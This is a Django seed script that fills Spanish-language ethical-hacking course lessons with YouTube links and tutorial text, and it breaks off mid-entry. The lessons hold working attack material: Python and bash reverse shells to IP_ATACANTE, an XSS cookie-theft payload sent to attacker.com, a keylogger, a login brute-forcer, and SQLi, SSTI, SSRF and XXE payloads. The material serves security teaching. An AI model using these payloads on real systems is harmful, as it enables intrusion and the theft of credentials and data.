"""
Pobla todas las lecciones con video de YouTube y descripcion real.
python manage.py shell < seed_lessons.py
"""
from apps.classroom.models import Lesson, Course

# Videos de YouTube reales de canales de ciberseguridad (IDs verificados)
# Fuentes: NetworkChuck, John Hammond, TheCyberMentor, LiveOverflow, IppSec, David Bombal

LESSON_DATA = {
    # ── Hacking Etico desde Cero ──────────────────────────────────────────────
    "Que es el hacking etico": {
        "video": "https://www.youtube.com/watch?v=WnN6dbos5u8",
        "content": "El hacking etico consiste en aplicar tecnicas de ataque informatico con permiso explicito del propietario del sistema, con el objetivo de identificar vulnerabilidades antes de que lo hagan actores maliciosos.\n\nEn esta leccion veremos:\n- Diferencia entre hacker etico, pentester y red teamer\n- El concepto de 'Rules of Engagement'\n- Tipos de pruebas: caja negra, caja gris y caja blanca\n- Marco legal en Espana: Ley Organica 10/1995 y el Codigo Penal\n- Por que las empresas necesitan pentesters\n\nRecuerda: nunca pruebes sistemas sin autorizacion escrita. Incluso una prueba bien intencionada puede tener consecuencias legales graves."
    },
    "Terminologia y conceptos clave": {
        "video": "https://www.youtube.com/watch?v=l0kHVCFT-b8",
        "content": "Antes de empezar a hackear necesitas dominar el vocabulario del sector. Esta leccion cubre los terminos que escucharas constantemente.\n\nTerminos esenciales:\n- Vulnerabilidad: debilidad en un sistema que puede ser explotada\n- Exploit: codigo que aprovecha una vulnerabilidad\n- Payload: codigo que se ejecuta tras un exploit exitoso\n- CVE: identificador estandar para vulnerabilidades publicas\n- CVSS: sistema de puntuacion de gravedad (0-10)\n- Zero-day: vulnerabilidad sin parche publico conocido\n- Pivot: moverse lateralmente desde un sistema comprometido a otro\n- C2 / C&C: servidor de Comando y Control\n- IOC: Indicador de Compromiso\n\nEstudia estos terminos porque aparecen en certificaciones, entrevistas y en el trabajo diario."
    },
    "Entorno de laboratorio con VirtualBox": {
        "video": "https://www.youtube.com/watch?v=ReSvnmd7AQU",
        "content": "Un laboratorio de hacking etico es tu campo de entrenamiento seguro. Nunca practiques en sistemas reales sin autorizacion.\n\nQue necesitas instalar:\n1. VirtualBox (gratuito) o VMware Workstation\n2. Kali Linux 2024 como maquina atacante\n3. Metasploitable 2/3 como objetivo vulnerable\n4. Windows Server 2019 evaluation (opcional para Active Directory)\n\nConfiguracion de red recomendada:\n- Red interna: solo las VMs se comunican entre si\n- NAT para que Kali tenga acceso a internet\n- Desactiva la comparticion de carpetas con el host\n\nSnapshots: saca uno antes de cada practica para poder revertir el estado facilmente. Esto te ahorrara muchas reinstalaciones."
    },
    "Google Dorks avanzados": {
        "video": "https://www.youtube.com/watch?v=QZQZ8mK7-II",
        "content": "Google Dorks son consultas especiales que aprovechan los operadores avanzados de Google para encontrar informacion que normalmente no es visible en busquedas normales.\n\nOperadores esenciales:\n- site:ejemplo.com filetype:pdf\n- intitle:'index of' /backup\n- inurl:admin login\n- cache:ejemplo.com\n- 'password' filetype:log site:ejemplo.com\n\nCasos de uso reales:\n- Encontrar paneles de administracion expuestos\n- Localizar ficheros de configuracion con credenciales\n- Descubrir subdominios y rutas no indexadas\n- Buscar ficheros sensibles (.env, .sql, .bak)\n\nRecurso: Google Hacking Database (GHDB) en Exploit-DB tiene miles de dorks catalogados por categoria."
    },
    "Reconocimiento con Recon-ng y theHarvester": {
        "video": "https://www.youtube.com/watch?v=La3iWKRX-tE",
        "content": "Recon-ng y theHarvester son las dos herramientas OSINT mas utilizadas para la fase de reconocimiento activo en un pentest.\n\ntheHarvester - recogida de emails, subdominios e IPs:\n```\ntheHarvester -d ejemplo.com -b google,bing,linkedin\ntheHarvester -d ejemplo.com -b all -f resultado.html\n```\n\nRecon-ng - framework modular tipo Metasploit para OSINT:\n```\nrecon-ng\nworkspaces create objetivo\nmarketplace install all\nmodules load recon/domains-hosts/google_site_web\nrun\n```\n\nFuentes de datos utiles: LinkedIn para empleados, Shodan para IPs, Censys para certificados, BuiltWith para tecnologias web, Wayback Machine para versiones antiguas."
    },
    "Shodan el buscador de hackers": {
        "video": "https://www.youtube.com/watch?v=5mOfVfSBMoo",
        "content": "Shodan es un motor de busqueda que indexa dispositivos conectados a internet: routers, camaras, servidores, PLCs industriales, y cualquier cosa con IP publica.\n\nBusquedas utiles en Shodan:\n- hostname:ejemplo.com\n- org:'Nombre Empresa' port:22\n- product:'Apache httpd' version:'2.4.49'\n- country:ES city:Madrid port:3389\n- vuln:CVE-2021-44228 (Log4Shell)\n\nShodan CLI:\n```\npip install shodan\nshodan init TU_API_KEY\nshodan host 1.2.3.4\nshodan search 'apache 2.4.49' --fields ip_str,port,org\n```\n\nMonetorea tu empresa: crea alerts para tu IP/ASN y recibe notificaciones cuando Shodan detecte nuevos puertos abiertos."
    },
    "Practica OSINT objetivo real": {
        "video": "https://www.youtube.com/watch?v=q2WCbQQpjP8",
        "content": "En esta leccion practica aplicamos todas las tecnicas OSINT aprendidas sobre un objetivo de practica autorizado.\n\nMetodologia OSINT completa:\n1. Reconocimiento pasivo: Shodan, Censys, theHarvester\n2. Analisis DNS: whois, dig, subfinder, amass\n3. Analisis web: BuiltWith, Wappalyzer, Wayback Machine\n4. Redes sociales: LinkedIn, Twitter, GitHub\n5. Busqueda de credenciales: HaveIBeenPwned, DeHashed\n\nPlantilla de informe OSINT:\n- Resumen ejecutivo\n- Informacion de dominio y DNS\n- Activos descubiertos (IPs, subdominios, tecnologias)\n- Empleados identificados\n- Credenciales expuestas\n- Recomendaciones\n\nHerramienta bonus: maltego para visualizar las relaciones entre todos los datos encontrados."
    },
    "Nmap desde principiante a avanzado": {
        "video": "https://www.youtube.com/watch?v=Rp69edBmFFo",
        "content": "Nmap (Network Mapper) es la herramienta estandar de escaneo de redes. Dominarla es imprescindible para cualquier pentester.\n\nEscaneos mas usados:\n```bash\n# Descubrimiento de hosts en red\nnmap -sn 192.168.1.0/24\n\n# Escaneo SYN rapido (requiere root)\nnmap -sS -T4 -p- objetivo.com\n\n# Deteccion de versiones y OS\nnmap -sV -O -A objetivo.com\n\n# Scripts NSE de vulnerabilidades\nnmap --script vuln objetivo.com\n\n# Escaneo UDP\nnmap -sU --top-ports 100 objetivo.com\n```\n\nTipos de escaneo:\n- -sS: SYN scan (sigiloso, no completa el handshake)\n- -sT: TCP Connect (sin privilegios)\n- -sU: UDP (lento pero importante)\n- -sN/-sF/-sX: Null, FIN, Xmas (bypass firewalls)\n\nFormatos de salida: -oN (normal), -oX (XML), -oG (greppable), -oA (todos)"
    },
    "Enumeracion de servicios web": {
        "video": "https://www.youtube.com/watch?v=hnNNRRHy0Js",
        "content": "Una vez identificado un servidor web, el siguiente paso es enumerar su contenido, tecnologias y posibles puntos de entrada.\n\nHerramientas de enumeracion web:\n\nFeroxbuster (fuzzing de directorios, mas rapido que dirb):\n```\nferoxbuster -u https://objetivo.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt\n```\n\nffuf (fuzz de parametros y subdominios):\n```\nffuf -w wordlist.txt -u https://objetivo.com/FUZZ\nffuf -w subdomains.txt -u https://FUZZ.objetivo.com -H 'Host: FUZZ.objetivo.com'\n```\n\nWhatWeb / Wappalyzer: identificar CMS, frameworks, versiones.\n\nWaybackurls: encontrar URLs antiguas que pueden tener parametros vulnerables:\n```\nwaybackurls objetivo.com | grep '=' | tee urls_parametros.txt\n```"
    },
    "Nikto y dirbusting": {
        "video": "https://www.youtube.com/watch?v=K78YOmbuT48",
        "content": "Nikto es un scanner web que detecta mas de 6700 vulnerabilidades conocidas, configuraciones incorrectas y archivos peligrosos.\n\nUso basico de Nikto:\n```bash\nnikto -h https://objetivo.com\nnikto -h objetivo.com -port 443 -ssl\nnikto -h objetivo.com -output resultado.html -Format html\n```\n\nQue detecta Nikto:\n- Archivos peligrosos (.bak, .old, .orig)\n- Versiones de software con CVEs conocidos\n- Metodos HTTP peligrosos (PUT, DELETE)\n- Headers de seguridad ausentes\n- Configuraciones por defecto\n\nDirb para fuzzing clasico:\n```bash\ndirb https://objetivo.com /usr/share/wordlists/dirb/common.txt\ndirb https://objetivo.com -X .php,.html,.txt\n```\n\nNota: Nikto genera mucho ruido en los logs. Usarlo solo cuando el ruido no sea problema o en entornos autorizados donde queremos deteccion completa."
    },
    "Introduccion a Metasploit": {
        "video": "https://www.youtube.com/watch?v=8lR27r8Y_ik",
        "content": "Metasploit Framework es la plataforma de explotacion mas utilizada en el mundo del pentesting. Tiene mas de 2000 modulos.\n\nEstructura de Metasploit:\n- Exploits: codigo que aprovecha vulnerabilidades\n- Payloads: codigo ejecutado tras explotar (shells, meterpreter)\n- Auxiliares: scanners, fuzzers, herramientas de OSINT\n- Post-exploitation: modulos para post-explotacion\n\nFlujo basico:\n```\nmsfconsole\nuse exploit/windows/smb/ms17_010_eternalblue\nset RHOSTS 192.168.1.100\nset PAYLOAD windows/x64/meterpreter/reverse_tcp\nset LHOST 192.168.1.50\nexploit\n```\n\nMeterpreter comandos utiles:\n```\nsysinfo, getuid, getsystem\nhashdump, run post/multi/recon/local_exploit_suggester\nportfwd add -l 8080 -p 80 -r 10.0.0.1\n```"
    },
    "Explotacion manual vs automatizada": {
        "video": "https://www.youtube.com/watch?v=nc_4ml1BEDs",
        "content": "La explotacion automatizada con herramientas como Metasploit es rapida, pero un pentester profesional debe entender lo que ocurre internamente.\n\nCuando usar cada enfoque:\n\nExplotacion automatizada (Metasploit, SQLMap):\n- Pentests de caja negra con tiempo limitado\n- Cuando ya tienes la firma exacta de la vulnerabilidad\n- Para demostrar el impacto rapidamente al cliente\n\nExplotacion manual:\n- Entender el vector de ataque en profundidad\n- Cuando los exploits publicos no funcionan directamente\n- En engagements de Red Team donde el sigilo importa\n- Para certificaciones como OSCP (prohibido Metasploit salvo una maquina)\n\nEjemplo manual vs automatizado en SQLi:\n- Manual: ' OR 1=1--  en Burp Suite, extrayendo dato a dato\n- Automatizado: sqlmap -u 'url?id=1' --dbs --batch\n\nLa clave es entender primero manualmente y luego automatizar."
    },
    "Lab Explotacion de Metasploitable": {
        "video": "https://www.youtube.com/watch?v=svB-QmMCNHc",
        "content": "Metasploitable es una maquina virtual Linux intencionalmente vulnerable, perfecta para practicar sin riesgos legales.\n\nVulnerabilidades clasicas de Metasploitable 2:\n\n1. vsftpd 2.3.4 backdoor (puerto 21):\n```\nuse exploit/unix/ftp/vsftpd_234_backdoor\nset RHOSTS IP_METASPLOITABLE\nrun\n```\n\n2. Samba usermap_script (puerto 445):\n```\nuse exploit/multi/samba/usermap_script\nset RHOSTS IP_METASPLOITABLE\nset PAYLOAD cmd/unix/interact\nrun\n```\n\n3. Java RMI Server (puerto 1099):\n```\nuse exploit/multi/misc/java_rmi_server\nset RHOSTS IP_METASPLOITABLE\nrun\n```\n\nTras obtener acceso, practica:\n- Enumeracion de usuarios y grupos\n- Busqueda de ficheros con SUID/SGID\n- Escalada de privilegios a root\n- Extraccion del fichero /etc/shadow"
    },

    # ── Python para Ciberseguridad ────────────────────────────────────────────
    "Entorno Python y librerias esenciales": {
        "video": "https://www.youtube.com/watch?v=xKQG2TgikCA",
        "content": "Python es el lenguaje por excelencia de la ciberseguridad. Su sintaxis simple y su enorme ecosistema de librerias lo hacen ideal para automatizar tareas y desarrollar herramientas.\n\nLibrerias esenciales para seguridad:\n```\npip install requests scapy paramiko cryptography pwntools impacket\n```\n\n- requests: HTTP/HTTPS, fuzzing web, automation\n- scapy: manipulacion de paquetes de red\n- paramiko: SSH programatico\n- cryptography: cifrado/descifrado, firma digital\n- pwntools: exploitation de binarios (pwn/CTF)\n- impacket: protocolos Windows (SMB, NTLM, Kerberos)\n\nVirtual environments (siempre usarlos):\n```bash\npython3 -m venv pentest_env\nsource pentest_env/bin/activate\npip install -r requirements.txt\n```\n\nJupyter Notebook para experimentar:\n```\npip install jupyter\njupyter notebook\n```"
    },
    "Manejo de sockets y redes": {
        "video": "https://www.youtube.com/watch?v=3QiPc2lYFTs",
        "content": "Los sockets son la base de cualquier comunicacion de red. Entenderlos te permite construir tus propias herramientas de red desde cero.\n\nSocket TCP basico en Python:\n```python\nimport socket\n\n# Cliente TCP\ndef tcp_client(host, port, data):\n    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n    s.connect((host, port))\n    s.send(data.encode())\n    response = s.recv(4096)\n    s.close()\n    return response.decode()\n\n# Servidor TCP\ndef tcp_server(port):\n    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n    s.bind(('0.0.0.0', port))\n    s.listen(5)\n    while True:\n        client, addr = s.accept()\n        print(f'Conexion de {addr}')\n        client.send(b'Bienvenido!')\n        client.close()\n```\n\nUsos en seguridad: port scanners, banner grabbing, reverse shells, proxies, fuzzing de protocolos personalizados."
    },
    "Scripting con Scapy": {
        "video": "https://www.youtube.com/watch?v=c_7kPiRnBxI",
        "content": "Scapy te permite crear, enviar, capturar y diseccionar paquetes de red con total control sobre cada campo.\n\nPaquetes basicos:\n```python\nfrom scapy.all import *\n\n# Ping ICMP\npkt = IP(dst='8.8.8.8') / ICMP()\nresp = sr1(pkt, timeout=2)\nresp.show()\n\n# TCP SYN scan\npkt = IP(dst='192.168.1.1') / TCP(dport=80, flags='S')\nresp = sr1(pkt, timeout=2)\nif resp and resp.haslayer(TCP) and resp[TCP].flags == 'SA':\n    print('Puerto abierto')\n\n# ARP scan de red\npkts = Ether(dst='ff:ff:ff:ff:ff:ff') / ARP(pdst='192.168.1.0/24')\nresult, _ = srp(pkts, timeout=3)\nfor sent, received in result:\n    print(received.psrc, received.hwsrc)\n```\n\nUsos avanzados: ARP spoofing, DNS spoofing, inyeccion de paquetes, fuzzing de protocolos."
    },
    "Port scanner en Python": {
        "video": "https://www.youtube.com/watch?v=Oy42o9kMiiI",
        "content": "Construir tu propio port scanner en Python te enseña exactamente como funciona Nmap por dentro y te da una herramienta totalmente personalizable.\n\nPort scanner con threads:\n```python\nimport socket\nimport threading\nfrom queue import Queue\n\ndef scan_port(host, port, results):\n    try:\n        s = socket.socket()\n        s.settimeout(0.5)\n        s.connect((host, port))\n        banner = ''\n        try:\n            banner = s.recv(1024).decode().strip()\n        except:\n            pass\n        results.append((port, 'open', banner))\n        s.close()\n    except:\n        pass\n\ndef fast_scan(host, ports):\n    results = []\n    threads = []\n    for port in ports:\n        t = threading.Thread(target=scan_port, args=(host, port, results))\n        t.start()\n        threads.append(t)\n    for t in threads:\n        t.join()\n    return sorted(results)\n\nif __name__ == '__main__':\n    host = '192.168.1.1'\n    open_ports = fast_scan(host, range(1, 1025))\n    for port, status, banner in open_ports:\n        print(f'{port}/tcp {status}  {banner[:50]}')\n```"
    },
    "Web scraper para OSINT": {
        "video": "https://www.youtube.com/watch?v=XVv6mJpFOb0",
        "content": "Un web scraper para OSINT extrae informacion publica de webs de forma automatizada. Es una tecnica fundamental en la fase de reconocimiento.\n\nScraper con requests + BeautifulSoup:\n```python\nimport requests\nfrom bs4 import BeautifulSoup\nimport re\n\ndef extract_emails(url):\n    headers = {'User-Agent': 'Mozilla/5.0'}\n    resp = requests.get(url, headers=headers, timeout=10)\n    soup = BeautifulSoup(resp.text, 'html.parser')\n    \n    # Emails en texto\n    emails = set(re.findall(r'[\\w.-]+@[\\w.-]+\\.\\w+', soup.get_text()))\n    \n    # Emails en mailto:\n    for link in soup.find_all('a', href=True):\n        if 'mailto:' in link['href']:\n            emails.add(link['href'].replace('mailto:', ''))\n    \n    return emails\n\ndef extract_links(url):\n    resp = requests.get(url)\n    soup = BeautifulSoup(resp.text, 'html.parser')\n    return [a['href'] for a in soup.find_all('a', href=True)]\n```\n\nEtica: respeta el robots.txt, no sobrecargues servidores, solo extrae datos publicos."
    },
    "Automatizacion con requests y BeautifulSoup": {
        "video": "https://www.youtube.com/watch?v=MeBU-4Xs2RU",
        "content": "Automatizar peticiones HTTP con requests es una habilidad esencial para fuzzing web, testing de APIs y automatizacion de ataques.\n\nTecnicas avanzadas con requests:\n```python\nimport requests\n\n# Sesion con autenticacion\nsession = requests.Session()\nlogin_data = {'username': 'admin', 'password': 'admin123'}\nsession.post('http://objetivo/login', data=login_data)\n\n# Fuzzing de parametros\nwith open('payloads.txt') as f:\n    for payload in f:\n        resp = session.get(f'http://objetivo/page?id={payload.strip()}')\n        if 'error' in resp.text.lower() or resp.status_code != 200:\n            print(f'Anomalia con payload: {payload.strip()}')\n\n# Brute force con wordlist\nwith open('passwords.txt') as f:\n    for pwd in f:\n        r = requests.post('http://objetivo/login',\n                         data={'user': 'admin', 'pass': pwd.strip()})\n        if 'dashboard' in r.url or 'logout' in r.text:\n            print(f'Password encontrada: {pwd.strip()}')\n            break\n```"
    },
    "Buffer overflow basico en Python": {
        "video": "https://www.youtube.com/watch?v=1S0aBV-Waeo",
        "content": "El buffer overflow es una de las vulnerabilidades mas clasicas y sigue siendo relevante. Aprender a explotarlo te da una base solida para pwn avanzado.\n\nConcepto:\nUn buffer overflow ocurre cuando se escribe mas datos de los que un buffer puede contener, sobreescribiendo areas adyacentes de memoria como el return address.\n\nFlujo de explotacion de un BOF simple:\n```python\nimport socket\nimport struct\n\n# 1. Fuzzing - encontrar el punto de crash\nfor size in range(100, 5000, 100):\n    payload = b'A' * size\n    # enviar al servicio\n\n# 2. Encontrar offset con cyclic pattern\n# msf-pattern_create -l 2000\n# msf-pattern_offset -l 2000 -q VALOR_EIP\n\n# 3. Control del EIP\noffset = 1337\neip = struct.pack('<I', 0xdeadbeef)  # little endian\npayload = b'A' * offset + eip\n\n# 4. Shellcode (msfvenom -p windows/shell_reverse_tcp LHOST=IP LPORT=4444 -f python -b '\\x00')\n# payload = b'A' * offset + eip + b'\\x90' * 16 + shellcode\n```\n\nHerramientas: pwndbg, pwntools, msfvenom, ROPgadget."
    },
    "Reverse shell en Python": {
        "video": "https://www.youtube.com/watch?v=Ts4vMpOcMxk",
        "content": "Una reverse shell es una conexion que el objetivo hace hacia el atacante, util cuando hay NAT o firewall que bloquea conexiones entrantes al objetivo.\n\nReverse shell Python puro:\n```python\n# En el objetivo (victima)\nimport socket, subprocess, os\n\ns = socket.socket()\ns.connect(('IP_ATACANTE', 4444))\nos.dup2(s.fileno(), 0)  # stdin\nos.dup2(s.fileno(), 1)  # stdout\nos.dup2(s.fileno(), 2)  # stderr\nsubprocess.call(['/bin/bash', '-i'])\n```\n\nEn el atacante (listener):\n```bash\nnc -lvnp 4444\n```\n\nMejorar la shell (completamente interactiva):\n```bash\npython3 -c 'import pty; pty.spawn(\"/bin/bash\")'\n# Ctrl+Z\nstty raw -echo; fg\nexport TERM=xterm\n```\n\nUsos legales: post-explotacion en pentests autorizados, CTFs, aprendizaje en entornos propios."
    },
    "Keylogger y RAT basico": {
        "video": "https://www.youtube.com/watch?v=m0LHZbJsqGs",
        "content": "Estudiar como funcionan keyloggers y RATs es fundamental para defender sistemas. Importante: solo con fines educativos en sistemas propios.\n\nKeylogger simple con pynput:\n```python\nfrom pynput.keyboard import Key, Listener\nfrom datetime import datetime\n\nlog = []\n\ndef on_press(key):\n    try:\n        log.append(str(key.char))\n    except AttributeError:\n        log.append(f'[{key}]')\n    if len(log) > 100:\n        with open('keylog.txt', 'a') as f:\n            f.write(''.join(log))\n        log.clear()\n\nwith Listener(on_press=on_press) as listener:\n    listener.join()\n```\n\nComponentes de un RAT:\n1. Client (en el objetivo): ejecuta comandos, sube/baja archivos, toma screenshots\n2. Server (atacante): interfaz de control, gestiona multiples victimas\n3. Comunicacion: sockets TCP, HTTP, DNS (para C2 encubierto)\n\nDeteccion: EDR/AV detectan estos patrones. Aprender como se detectan es tan valioso como saber como funcionan."
    },

    # ── Seguridad Web OWASP Top 10 ────────────────────────────────────────────
    "Que es OWASP y por que importa": {
        "video": "https://www.youtube.com/watch?v=fqnkR3SzUSA",
        "content": "OWASP (Open Web Application Security Project) es una fundacion sin animo de lucro dedicada a mejorar la seguridad del software. Su documento mas conocido es el OWASP Top 10.\n\nEl OWASP Top 10 (2021):\n1. A01 - Broken Access Control\n2. A02 - Cryptographic Failures\n3. A03 - Injection\n4. A04 - Insecure Design\n5. A05 - Security Misconfiguration\n6. A06 - Vulnerable and Outdated Components\n7. A07 - Identification and Authentication Failures\n8. A08 - Software and Data Integrity Failures\n9. A09 - Security Logging and Monitoring Failures\n10. A10 - Server-Side Request Forgery (SSRF)\n\nPor que importa:\n- Referencia estandar en el sector: auditores, desarrolladores y clientes hablan el mismo idioma\n- Base de muchas certificaciones y regulaciones\n- El punto de partida para cualquier evaluacion de seguridad web"
    },
    "Configuracion de DVWA y BurpSuite": {
        "video": "https://www.youtube.com/watch?v=dHQHzB7iKoM",
        "content": "DVWA (Damn Vulnerable Web Application) es la aplicacion web vulnerable mas usada para practicar. BurpSuite es el proxy de interceptacion estandar.\n\nInstalacion DVWA con Docker:\n```bash\ndocker run -d -p 8080:80 vulnerables/web-dvwa\n# Acceder a http://localhost:8080\n# Login: admin / password\n# Configurar BD en /setup.php\n```\n\nConfiguracion de BurpSuite Community:\n1. Proxy > Options > Add listener en 127.0.0.1:8080\n2. Configurar el navegador para usar el proxy\n3. Instalar certificado CA de Burp: http://burpsuite/cert\n4. Activa 'Intercept' para capturar peticiones\n\nFlujo de trabajo basico:\n1. Navega por la app con intercept ON\n2. Envia peticiones interesantes al Repeater (Ctrl+R)\n3. Usa el Scanner para descubrir vulnerabilidades\n4. Intruder para fuzzing automatizado\n\nShortcuts clave: Ctrl+I (intruder), Ctrl+R (repeater), Ctrl+S (scanner)"
    },
    "SQL Injection teoria y practica": {
        "video": "https://www.youtube.com/watch?v=2OPVViV-GGk",
        "content": "SQL Injection sigue siendo una de las vulnerabilidades mas criticas y mas encontradas en aplicaciones web reales.\n\nTipos de SQL Injection:\n- In-band SQLi: el resultado se muestra directamente en la respuesta\n  - Union-based: extrae datos con UNION SELECT\n  - Error-based: extrae datos de mensajes de error\n- Blind SQLi: no hay output visible, inferimos true/false\n  - Boolean-based: respuestas diferentes segun condicion\n  - Time-based: usamos SLEEP() para confirmar ejecucion\n- Out-of-band: datos via DNS o HTTP a servidor externo\n\nPayloads basicos para deteccion:\n```\n' OR '1'='1\n' OR 1=1--\n'; DROP TABLE users;--\n' UNION SELECT NULL,NULL--\n```\n\nExtraccion con UNION:\n```sql\n' UNION SELECT 1,2,3--\n' UNION SELECT table_name,2,3 FROM information_schema.tables--\n' UNION SELECT column_name,2,3 FROM information_schema.columns WHERE table_name='users'--\n' UNION SELECT username,password,3 FROM users--\n```\n\nPrevencion: prepared statements, ORM, WAF, principio de minimo privilegio en DB."
    },
    "SQLMap automatizando SQLi": {
        "video": "https://www.youtube.com/watch?v=nVj8MUKkzQk",
        "content": "SQLMap es la herramienta de referencia para automatizar la deteccion y explotacion de SQL Injection.\n\nComandos esenciales:\n```bash\n# Deteccion basica\nsqlmap -u 'http://objetivo/page.php?id=1'\n\n# Con cookies de sesion\nsqlmap -u 'http://objetivo/page.php?id=1' --cookie='session=abc123'\n\n# POST request\nsqlmap -u 'http://objetivo/login' --data='user=admin&pass=test'\n\n# Enumerar bases de datos\nsqlmap -u 'http://objetivo/?id=1' --dbs\n\n# Enumerar tablas de una DB\nsqlmap -u 'http://objetivo/?id=1' -D nombre_db --tables\n\n# Volcar tabla completa\nsqlmap -u 'http://objetivo/?id=1' -D nombre_db -T users --dump\n\n# Shell en el sistema (si hay privilegios)\nsqlmap -u 'http://objetivo/?id=1' --os-shell\n```\n\nFlags utiles: --batch (sin confirmaciones), --level 5 --risk 3 (mas agresivo), --tamper=space2comment (bypass WAF), --proxy=http://127.0.0.1:8080 (pasar por Burp)"
    },
    "Command Injection y SSTI": {
        "video": "https://www.youtube.com/watch?v=GGsf1-S_V9c",
        "content": "Command Injection ocurre cuando la aplicacion pasa datos del usuario directamente a comandos del sistema operativo sin sanitizarlos.\n\nCommand Injection - deteccion y explotacion:\n```\n# Payloads de deteccion\n127.0.0.1; id\n127.0.0.1 | id\n127.0.0.1 & id\n127.0.0.1 `id`\n127.0.0.1 $(id)\n\n# Reverse shell via command injection\n127.0.0.1; bash -i >& /dev/tcp/IP_ATACANTE/4444 0>&1\n```\n\nServer-Side Template Injection (SSTI) - cuando el input se renderiza como template:\n```\n# Jinja2 (Python/Flask)\n{{7*7}}           # si devuelve 49 -> vulnerable\n{{config}}\n{{self._TemplateReference__context.cycler.__init__.__globals__.os.popen('id').read()}}\n\n# Twig (PHP)\n{{7*7}}\n{{system('id')}}\n```\n\nPrevencion Command Injection: usar APIs seguras (subprocess.run con lista), nunca shell=True con input del usuario."
    },
    "Cross-Site Scripting XSS completo": {
        "video": "https://www.youtube.com/watch?v=L5l9lSnNMxg",
        "content": "XSS (Cross-Site Scripting) permite inyectar JavaScript malicioso en paginas vistas por otros usuarios. Es la vulnerabilidad web mas prevalente.\n\nTipos de XSS:\n- Reflected: el payload viene en la URL y se refleja en la respuesta\n- Stored: el payload se almacena en la DB y afecta a todos los usuarios\n- DOM-based: el payload se ejecuta manipulando el DOM sin pasar por el servidor\n\nPayloads de deteccion:\n```html\n<script>alert(1)</script>\n<img src=x onerror=alert(1)>\n<svg onload=alert(1)>\n\"><script>alert(1)</script>\n```\n\nRobo de cookies (stored XSS):\n```javascript\n<script>\nnew Image().src = 'https://attacker.com/steal?c=' + document.cookie;\n</script>\n```\n\nBypass de filtros comunes:\n```html\n<ScRiPt>alert(1)</ScRiPt>\n<img src=x oNeRrOr=alert(1)>\njavascript:alert(1)\n```\n\nPrevencion: escape de output, Content Security Policy (CSP), HttpOnly en cookies, validacion de input."
    },
    "CSRF ataques y defensas": {
        "video": "https://www.youtube.com/watch?v=vRBihr41JTo",
        "content": "CSRF (Cross-Site Request Forgery) engana al navegador de una victima autenticada para que realice peticiones no deseadas en su nombre.\n\nComo funciona:\n1. Victima esta autenticada en banco.com\n2. Victima visita malicious.com (controlado por atacante)\n3. malicious.com tiene un formulario oculto que envia una transferencia a banco.com\n4. El navegador adjunta automaticamente las cookies de banco.com\n5. La transferencia se ejecuta sin que la victima lo sepa\n\nEjemplo de ataque:\n```html\n<!-- En la pagina del atacante -->\n<form action='https://banco.com/transfer' method='POST' id='f'>\n  <input name='to' value='atacante'>\n  <input name='amount' value='1000'>\n</form>\n<script>document.getElementById('f').submit()</script>\n```\n\nDefensas:\n- CSRF tokens: valor aleatorio unico por sesion en cada formulario\n- SameSite cookies: Strict o Lax\n- Verificar el header Origin/Referer\n- Double Submit Cookie pattern\n- Re-autenticacion para acciones criticas"
    },
    "Bypass de WAF": {
        "video": "https://www.youtube.com/watch?v=rHkPJSMFBv0",
        "content": "Los Web Application Firewalls (WAF) filtran trafico malicioso, pero existen multiples tecnicas para bypassearlos.\n\nTecnicas de bypass para SQLi:\n```sql\n-- Comentarios para romper palabras clave detectadas\nSE/**/LECT\nSELECT/**/username/**/FROM/**/users\n\n-- URL encoding\n%53%45%4C%45%43%54 (SELECT)\n%27 (comilla simple)\n\n-- Case variation\nSeLeCt UsErNaMe FrOm UsErS\n\n-- Codificacion alternativa\nCHAR(83,69,76,69,67,84)  -- SELECT en CHAR()\n```\n\nTecnicas para XSS:\n```html\n<!-- HTML entities -->\n&#x3C;script&#x3E;alert(1)&#x3C;/script&#x3E;\n\n<!-- Fragmentacion -->\n<scr<script>ipt>alert(1)</scr</script>ipt>\n\n<!-- Eventos alternativos -->\n<body onpageshow=alert(1)>\n<video src=1 onerror=alert(1)>\n```\n\nHerramienta: sqlmap --tamper tiene 50+ scripts de bypass. Repositorio: https://github.com/sqlmapproject/sqlmap/tree/master/tamper"
    },
    "SSRF y XXE": {
        "video": "https://www.youtube.com/watch?v=eCI1SoFo5kI",
        "content": "SSRF y XXE son dos vulnerabilidades que permiten al atacante hacer que el servidor haga peticiones o procese datos en su nombre.\n\nSSRF (Server-Side Request Forgery):\n```\n# Acceder a servicios internos\nhttps://objetivo.com/fetch?url=http://localhost/admin\nhttps://objetivo.com/fetch?url=http://192.168.1.1/\n\n# Metadata de cloud (AWS)\nhttps://objetivo.com/fetch?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/\n\n# Bypass de filtros con @ y #\nhttps://objetivo.com/fetch?url=http://atacante.com@192.168.1.1/\n```\n\nXXE (XML External Entity Injection):\n```xml\n<?xml version='1.0'?>\n<!DOCTYPE foo [<!ENTITY xxe SYSTEM 'file:///etc/passwd'>]>\n<root><data>&xxe;</data></root>\n```\n\nXXE para SSRF interno:\n```xml\n<!DOCTYPE foo [<!ENTITY xxe SYSTEM 'http://192.168.1.1/admin'>]>\n```\n\nPrevencion SSRF: whitelist de URLs permitidas, desactivar redireccion, no exponer servicios internos. Prevencion XXE: deshabilitar procesamiento de entidades externas en el parser XML."
    },
    "Broken Access Control": {
        "video": "https://www.youtube.com/watch?v=O6BUJqc_xFM",
        "content": "Broken Access Control es la vulnerabilidad #1 segun OWASP 2021. Ocurre cuando usuarios pueden acceder a recursos o realizar acciones para las que no tienen permiso.\n\nTipos de Broken Access Control:\n\nIDOR (Insecure Direct Object Reference):\n```\nGET /api/users/1/profile -> cambia a /api/users/2/profile (otro usuario)\nGET /api/orders/12345 -> cambia a /api/orders/12346 (pedido de otro)\n```\n\nEscalada horizontal (mismo nivel):\n- Cambiar un ID en la URL/body para acceder a datos de otro usuario\n\nEscalada vertical (subir privilegios):\n```\nPOST /api/users -> con body {role: 'admin'}\n# Si el servidor acepta el campo role del cliente, privilegio escalado\n```\n\nForced browsing:\n```\nhttps://objetivo.com/admin/panel  # sin ser admin\nhttps://objetivo.com/user/settings?id=OTRO_ID\n```\n\nPrevenciones: denegar por defecto, verificar permisos en el servidor (nunca en el cliente), logs de acceso, tests automatizados de autorizacion."
    },
    "Insecure Deserialization": {
        "video": "https://www.youtube.com/watch?v=t-WHZONHSaE",
